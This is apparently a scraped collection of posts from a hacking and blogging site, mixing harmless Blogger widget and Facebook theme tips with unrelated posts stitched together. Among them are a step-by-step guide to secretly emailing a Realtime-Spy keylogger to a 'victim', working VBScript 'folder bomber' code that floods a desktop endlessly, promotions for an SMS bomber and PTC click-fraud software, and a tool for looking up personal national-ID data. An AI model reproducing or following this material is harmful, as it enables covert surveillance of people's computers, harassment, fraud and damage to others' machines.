How To Change Facebook Theme

How To Change Facebook Theme

                  

Today I am gonna show u how to change fb theme  and login page ;)

To Change fb theme , and login page u will need add ons (stylish)

1. First Install Stylish add ons to firefox/chrome ,
Firefox Version 
Chrome Version 

2. Once u installed it ,
visit this site : Click Here


There select ur theme which u want to install to ur fb . I already have installed one for login page.
Simple enough :p
Selecting ur theme, click on that link, u will direct to another page.
There click install with sylish on top right corner of page w
ith green button.





                          



              
                            






                    





Hope U will find this tut helpful :)

Add Google Official Contact Form Widget to Blogger?


Add Google Official Contact Form Widget to Blogger
Contact Form Widget is used to send mails to the Blog owner from the visitors/users. Do your blog looks anything missing?. I think a Contact Form is an important widget that was missed for long time. Are you using Contact From in your blog? If so, it will not Google's Official contact Form. That may be from other hosted providers. Here Google released its brand new Contact Form Widget for Blogger Users. It helps to send e-mails to blog owner without Sign In to Google or any other account. Anyone can send mails by providing a valid e-mail address and Message. This Contact Form can add to any blogger blogs that hosted in Google's Server.


 It have three Fields- Name,e-mail and Message and a Send Button. E-mail and Message field are mandatory. It also have e-mail validation, checks whether the e-mail address provided is valid or not. And a notice or message will appear to show the status of sending e-mail, Shows success message it it delivered to user,otherwise shows error message.  There is no CAPTCHA (Used to prevent Spam) in the Contact Form, but Google implemented its effective Spam detection mechanisms. The problem exist with the Contact Form is it can only use as Widget (in Sidebar or  Footer or Under Posts). In many popular websites/blogs they use a page for Contact Form. By default this Contact Form can used as widget, we introduce a technique to use Google Official contact Form on Blogger Static Pages 

Advantages

  • Send e-mails to Blog owner without Sign In to any Accounts.
  • E-mail validation is provided.
  • Spam detection Mechanism.
  • Show status message of sending.

Disadvantages

  • Use only as Widget (in Sidebar/ in Footer)
  • No CAPTCHA

Add Google Contact Form to Blogger

  • Sign In to Blogger Dashboard
  • Select Layout -> Click on Add a Gadget
  •  Select More Gadgets in Left Side and Select Contact Form
  • Give the Title and Click Save


  • You have done please check your blog.
When visitor drop a message it goes straight to your inbox. One copy of the message will send to each Admin.
I hope this Contact Form will help your blog to get Suggestions and queries from visitors.

Multi colored random posts Widget for Blogger EXCLUSIVE.!!!!


Multi colored random posts Widget for Blogger
Random Posts widget is an awesome widget for your Blogger Blog.We posted about How to add random posts widget, Most important feature of this widget is it lets your Blog visitors to surf more blog posts in your blog.Its let your users to spend more time in your Blog. Surely it increases your Blog's internal links that lets your blog higher traffic.This is the modified version of the Random posts widget we posted earlier, one of our visitor "Yogesh Gamer" asked me to make this widget like Multi colored Popular posts Widget. So after that I just tried and it got success. Please do check this widget and comment your suggestions...



Check out Related Articles
Awesome Random Posts Widget For Blogger
Awesome Multi-Colored Popular Posts Widget for Blogger

Features of This Widget

  •  Flat UI colors used (it will attract users attention)
  • Automatic Post Numbering

  • Sign In to Blogger Dashboard
  • Go to Layout
  • Click on Add Gadget and look for HTML/Javascript and select it
  • Copy the below code inside it and click save
<style type="text/css">
.noop-random-posts ul li {
    list-style-image:none;
}.noop-random-posts ul {
list-style-type: none;
margin: 0;
padding: 5px 0;
}
.noop-random-posts ul li {
border: 0 none;
margin: 5px 0;
padding: 10px;
position: relative;
}
.noop-random-posts ul li:first-child {
background: none repeat scroll 0 0 #FF4C54;
width: 97%;
}
.noop-random-posts ul li:first-child:after {
content: "1";
}
.noop-random-posts ul li:first-child + li {
background: none repeat scroll 0 0 #FF764C;
width: 87%;
}
.noop-random-posts ul li:first-child + li:after {
content: "2";
}
.noop-random-posts ul li:first-child + li + li {
background: none repeat scroll 0 0 #FFDE4C;
width: 84%;
}
.noop-random-posts ul li:first-child + li + li:after {
content: "3";
}
.noop-random-posts ul li:first-child + li + li + li {
background: none repeat scroll 0 0 #C7F25F;
width: 81%;
}
.noop-random-posts ul li:first-child + li + li + li:after {
content: "4";
}
.noop-random-posts ul li:first-child + li + li + li + li {
background: none repeat scroll 0 0 #33C9F7;
width: 78%;
}
.noop-random-posts ul li:first-child + li + li + li + li:after {
content: "5";
}
.noop-random-posts ul li:first-child + li + li + li + li + li {
background: none repeat scroll 0 0 #7EE3C7;
width: 75%;
}
.noop-random-posts ul li:first-child + li + li + li + li + li:after {
content: "6";
}
.noop-random-posts ul li:first-child + li + li + li + li + li + li {
background: none repeat scroll 0 0 #F6993D;
width: 72%;
}
.noop-random-posts ul li:first-child + li + li + li + li + li + li:after {
content: "7";
}
.noop-random-posts ul li:first-child + li + li + li + li + li + li + li {
background: none repeat scroll 0 0 #F59095;
width: 69%;
}
.noop-random-posts ul li:first-child + li + li + li + li + li + li + li:after {
content: "8";
}
.noop-random-posts ul li:first-child + li + li + li + li + li + li + li + li {
background: none repeat scroll 0 0 #C7F25F;
width: 66%;
}
.noop-random-posts ul li:first-child + li + li + li + li + li + li + li + li:after {
content: "9";
}
.noop-random-posts ul li:first-child:after, .noop-random-posts ul li:first-child + li:after, .noop-random-posts ul li:first-child + li + li:after, .noop-random-posts ul li:first-child + li + li + li:after, .noop-random-posts ul li:first-child + li + li + li + li:after, .noop-random-posts ul li:first-child + li + li + li + li + li:after, .noop-random-posts ul li:first-child + li + li + li + li + li + li:after, .noop-random-posts ul li:first-child + li + li + li + li + li + li + li:after, .noop-random-posts ul li:first-child + li + li + li + li + li + li + li + li:after {
background: none repeat scroll 0 0 #353535;
border-radius: 50% 50% 50% 50%;
color: #FFFFFF;
font-size: 25px;
height: 30px;
position: absolute;
right: -17px;
text-align: center;
top: 1px;
width: 30px;
}
.noop-random-posts ul li a {
color: #444444;
font-size: 13px;
text-decoration: none;
}

</style>
<div class="noop-random-posts"><script type="text/javascript">
    var randarray = new Array();var l=0;var flag;
    var numofpost=5;function nooprandomposts(json){
    var total = parseInt(json.feed.openSearch$totalResults.$t,10);
    for(i=0;i < numofpost;){flag=0;randarray.length=numofpost;l=Math.floor(Math.random()*total);for(j in randarray){if(l==randarray[j]){ flag=1;}}
    if(flag==0&&l!=0){randarray[i++]=l;}}document.write('<ul>');
    for(n in randarray){ var p=randarray[n];var entry=json.feed.entry[p-1];
    for(k=0; k < entry.link.length; k++){if(entry.link[k].rel=='alternate'){var item = "<li>" + "<a href=" + entry.link[k].href + ">" + entry.title.$t + "</a> </li>";
    document.write(item);}}
    }document.write('</ul>');}
    </script><a href="http://netoopsblog.blogspot.com" style="font-size:0pt">Blogger Widgets</a>
<script type="text/javascript" src="/feeds/posts/default?alt=json-in-script&start-index=1&max-results=1000&callback=nooprandomposts"></script></div>

Surprisingly HWS Blessed With Page-Rank 2.0!!


Never thought November could be such a blessing in my life! Just within 2 months of its release, HWS has amazingly being blessed with a Google Page Rank 2, which is a measure of a HWS's importance in the eyes of the Mega Search Engine like Google.

When the domain was on blogger i.e. blogspot.com ,the google page rank was 3 , but as I bought the .com domain the google page rank dropped to zero but now with the help of ALLAH , it again comes back to 2 and INSHAHLLAH within month we will surely achieve the page rank of 3 - 4 .

I am extremely thankful to all of my readers for their continuous support, love and dearest motivation. Verily I could not have achieved this success without the active participation and support of our readers because half the credit goes to all of you guys for gifting HWSwith precious content everyday with your keen,lovely and relevant comments.

Thumbs up to HWS and thumbs up to all of you readers for believing and trusting in the Moto of publishing unique content on Hacking and Online Earning. I thank Allah and then every single visitor, follower and subscriber without them the success of this day indeed would have no taste and flavour. God bless you all!
Today’s Lesson:- Be Unique in everything that you do for success itself is coloured uniqely and when success knocks your doors it really feels mind blowing! :D
Anonymous With SSH Tunnel + TOR

Anonymous With SSH Tunnel + TOR


| Internet, IP Address, Proxy, Security, Web Browser, WebTrick




Hello Friends!! today i am come with one more tutorial. I thought you read my old post  Anonymous on Cyber Space  http://www.hackarde.com/2012/05/how-to-use-tor-in-windows-for-anonymous.html  today post enhance of my last post. Today i am going to teach you use TOR with SSH Tunnel and use it on your Website hacking activity.



First Download two tool from here and Install it :




M.Soft CNIC Data Finder


Is Software Say Aap Pak CNIC Number ka Detail + Family Members Find kar Sakte Ho..!
Click On Download Button: 
 

Hack a computer remotely using Realtime spy

Hack a computer remotely using Realtime spy



Photobucket

I get this question asked daily "How to hack a computer remotely" OR "How to install a keylogger in a remote machine".As we know that in order to install a keylogger we must have physical access to victims computer.There are lots of methods to gain physical access such as Netbios hacking ,Trojans, Rats etc.However these methods require alot of skill and its very difficuly for newbies to do it.Alternatively we use a keylogger(Remote installation supported).All we have to do is to make sure that the remote file gets installed into victims computer and your done.Below we will go through the necessary steps required to hack a computer remotely and install a keylogger.I will be using Realtime spy.


Step 1

First of all download Realtime spy.After downloading your copy of Realtime-Spy navigate to where you downloaded (in this case it is on the Windows desktop). Double click the Realtime-Spy installer file to start the install.
NOTE: After install is complete you can delete this file!




Step 2

Upon finishing the installation you will be able to run Realtime-Spy's configuration file immediately. Do this and continue to the next step.
Step 3

You will now see the Realtime-Spy configuration window. Enter in your username and password that you received after purchasing Realtime-Spy. These must be entered EXACTLY as given. They are case sensitive, and take care not to mix up 0's with O's and I's with l's.
After you enter your username and password, choose whether or not you want Realtime-Spy to display a splash warning whenever it is ran, and how often you want it to clear its logs.

After you enter your username/password and select the options you want - press "next" to go to the next configuration panel.



Step 4
When you click "next" Realtime-Spy will verify your settings. If they are correct you will be able to configure your monitoring options, as shown below. Once you have your options set click "create" to create your logging module.



Step 5

Click "create" to create your logging module Or Remote file. You will be prompted for a name to give the file you are creating. In this example we have named it 'test' - you can name it whatever you want. Click Save and you will receive a message similar to the one below.

Remember the location of the file you have just created!


Step 6

Now it is time to send out the file to the remote PC. In this guide we are using Outlook Express on Windows XP.

Click the Create Mail button to open a new mail window.


Step 7

Click ATTACH and navigate to where you saved your Realtime-Spy file you created previously. Click on the file and then click 'Attach' to attach the file to your email.





Step 8

You will now have to enter a recipient for the file you are sending, as well as an email subject and body. Notice the size of the Realtime-Spy file - it should be approximately 100-120kb at all times!

Once you are ready to go click Send to send the email!


Step 9

Once you send out the file you can then login to your Realtime-Spy webspace. 

Enter in your username/password at the prompt to continue!




Step 10

You will be presented with your Realtime-Spy webspace. Here you can select and view users that were logged with the file you sent out.

Note: Users will only appear after they have downloaded and executed the file you have sent them.



If you have any problem regarding the installation feel free to comment.

Free Web Hosting in India : With PHP, FTP and MySQL supports: Ad free and Banner Free



Hostinger
Now a Days any one wants cheap web hosting, sometimes our visitors ask us about free premium quality web hosting. There are Numbers of Websites scattered on the cyberspace which allows users to create a free website but these websites allow users to build website only online through their web builder platforms. Many users create free websites using these platforms but these platforms do not allow users to remove the ad based hyperlinks from their websites. Everyone can easily guess that this site is made by a free web builder and anyone can use that link freely. But users want an ad free, banner free web hosting which allows users to work offline and publish the website after the work finished.


There are numbers of Web sites like jigsyownfreewebsitegoogle sites which allow users to create a free website but these websites has some limitations and may also paste a hyperlink or banner link on your website. You may also suffer the problem while using search engine optimization services. And they provide a subdomain. If user wants a premium domain to be hosted with these platforms, they charge a high amount of money in the name for the domain. But today we are sharing this information which may solve all these problems.
If you are tired of searching the bannerfree and ad free free website builder and web hosting plans, when you jumps towards the search results which shows the free web hosting and you find that they charge a high amount in the name of domain, Then your search ends here. We are sharing a great plan with you that allows you to build a free website with premium features absolutely free. Only you need to pay for a domain name but you need not to buy the domain from the site we share with you. You can register a domain name from anywhere which provide cheapest domain and can use these hosting plans with that domain. Even If you don’t want to pay for the domain you can also use a free dot.tk domain or a subdomain.
  
Free Web Hosting in India
We are sharing plan free hosting which is perfect for different types of small websites, such as personal, small firms, small companies, community, Blogs and Forums. The Hostinger India is the largest free web hosting company India. These companies have set the mark of Satisfaction. Today we are sharing the plans of Hostinger India.
Hostinger India Offers three Plans Free, Premium and Business. Free plans include the following features.
  • 2000 MB Disk Space
  • 100 GB Data Transfers
  • Unlimited Website Hosting
  • Easy to use Website Builder
  • 50 Auto Scripts
  • Data Backups but Limited
  • 99% Uptime Guarantee
  • PHP Supports
  • 2 MySQL Databases
  • PHPMYADMIN Tool
  • 2 FTP Accounts per website
  • SSH Web Console
  • 2 Emails per domain
  • Webmail, POP/IMAP access
  • 2 Sub domains for your domain eg. Subdomain.yourdomain.com
  • 10mbps server network speed with Xeon E3-1230 processor and 8GB RAM.
  • Easy Admin Panel as well as Professional Admin Panel
  • Custom Error Pages and IP Deny Manager
  • Add on Services and Domain Redirects
  • Search Engine Optimized Pages
  • Site statistics and Analytics
  • DNS Editor
  • Website Backup and Restore
  • Database Backup and Restores
  • And Much More
What is not included in free plan.
  • Free Domain Registration
  • Dedicated IP
  • SMTP Mail Access
  • Phone Support
  • Advanced Cron Jobs
  • Full SSH Access
  • FTP over SSL
  • SSL Certificates
  • Unlimited Features
Why Hostinger India?
Hostinger India is Largest Free Web Hosting Provider in India and proud to serve the satisfaction. Hostinger India has more than 93% satisfied free webhosting users and more than 99% premium and business users. These are some reason to choose the hostinger.
  • New generation of Free hosting
  • PHP and MySQL Supports
  • No Ads or Banner on your pages
  • Software auto Installer (Wordpress, Joomla, phpBB, Drupal and many other scripts)
  • Easy to use website builders for Beginners or persons have no knowledge of web hosting and web building.
  • Awesome Referral Schemes to get nice gifts like Camera, Free Domain and Money.
So guys what are you waiting for, Click Here and get your free website and enjoy a brilliant experience.

Silent SMS Bomber


Ye SMS Bomber ALL Network Pe Work karta Hain!
In Pe Password Nahi Hain Free Enjoy karlo.!
Requirement: .Net Framework 3.5 
 

Hack PTC sites with Multiclicker


PTC hacking
I recently wrote an article on hacking bux.to to make money,but the only problem with that method was limited to very less number of PTC sites moreover it only worked on firefox browser.So therefore i am mentioning a software to hack PTC websites.This software is named as Multiclicker


What are PTC sites?

PTC ie Paid To Click websites are the sites that pay you money just for clicking viewing advertisements. You have to view each ad for atleast 30 seconds and these PTC sites pay you around $0.01 and some times even morer for each ad

When and How do i get paid?

You  get paid once you reach the minimum threshold prescribed by the PTC website you are using.
You can get paid through Paypal,Alertpay etc.I personally recommend you using Alertpaybecause its availible in lots of countries.


What is muticlicker and what does it do?

Multiclicker is a PTC hacking application which automatically log in to your PTC account and starts clicking ads on PTC sites which is normally done by you. Thus, you have to rest back and Multiclicker starts making money for you.

How to hack PTC sites with Multiclicker?

To use multiclicker for PTC hacking just follow the steps:

Step 1:

Download Multiclicker software to hack ptc sites.

PTC hacking












Step 2

Extract the folder to view the files


Step 3:

Now just start using multiclicker software to make money online

List of popular PTC sites:

PTC hacking


Note:Use this software at your own risk

A Speaking Folder Bomber on the Desktop with Vbscript


This Code show you how it is easy to make some jokes with your friends or your victimes using the Vbscript. So I made a Speaking Folder Bomber on the Desktop.
The aim of this Vbscript is to Create Folders with names begin with VIRUS and a random Number in your desktop every 1 second in infinite Loop.And for the victim it become so hard to delete them manually.




I update this script to become more and more funny, so i add this feature and i tested it in windows xp and i don't know if it runs in windows Vista or Seven so please try it and give me your feedback.
The added feature is that the computer can say the name of the empty folder created by this script.

Code:
'----A Speaking Folder Bomber on the Desktop with Vbscript by Hackoo----
Dim fso,sho,basefolder,FolderBomb,bf
Set fso = CreateObject( "Scripting.FileSystemObject" )
Set sho = CreateObject( "Wscript.Shell" )
Set Voix=CreateObject("SAPI.SpVoice")
basefolder=sho.SpecialFolders("desktop")' Get your Desktop Folder
Set bf = fso.GetFolder( basefolder )
do
Randomize
r=Int((99999*Rnd)+1)
FolderBomb="VIRUS_"&r
Voix.speak FolderBomb 'The Computer speak and tell the name of the empty folder created by this script
bf.subFolders.Add(FolderBomb) 'Create Folders with names begin  with VIRUS and a random Number in your desktop
wscript.sleep 1000 'Pause of 1 second and continue the loop
loop

So for whom want to test this script in their computer without any problem i made for that an antidote or a cleaner.vbs
So when you execute it your desktop become Full of empty Folders with name like this VIRUS_2353 VIRUS_9876 etc.......
so to stop this .You must in first step stop and kill the wscript Process in the TaskManager.
The second step is to use My cleaner.vbs that i have made for this purpose because it's very hard to clean those folders manually.
To Stop Them just copy and paste this script below in Notepad and save it as Cleaner.vbs or Anti-FolderBomer.vbs or what you want but don't forget the extention must be .vbs and execute it and it delete all the Folders created by the Folder Bomber script.

Code:
'---------------Cleaner.vbs---------------
'--------------Made by Hackoo-------------
on error resume next
Dim fso, f, f1, fc, ss
Set fso = CreateObject("Scripting.FileSystemObject")
Set sho = CreateObject( "Wscript.Shell" )
basefolder=sho.SpecialFolders("desktop")
Set f = fso.GetFolder( basefolder )
Set fc = f.SubFolders
NomFichierLog="Dossiers_Vides"
temp = sho.ExpandEnvironmentStrings("%temp%")
Set OutPut = fso.CreateTextFile(temp & "\" & NomFichierLog & ".txt",1)
count=0 'initialisation du compteur des Dossiers vides
NBfichier=0 'initialisation du idesvompteur des fichiers
' Tuer le processus wscript
'sho.run "Taskkill /IM wscript.exe /F", 0
'Boucle pour la recherche des Dossiers vides
Msgbox f
For Each f1 in fc
If f1.size = 0 Then
count= count + 1
OutPut.WriteLine f1.Path
f1.delete
End if
Next
'Boucle pour la recherche des fichiers vides
For Each Fichier in f.files
if Fichier.size = 0 then
NBfichier=NBfichier+1
OutPut.WriteLine Fichier.Path
Fichier.delete
end if
next
Msgbox count& " Dossiers Vides ont été supprimés",64,"Dossiers Vides"
Msgbox NBfichier& " Fichiers Vides ont été supprimés",64,"Dossiers Vides"
Download It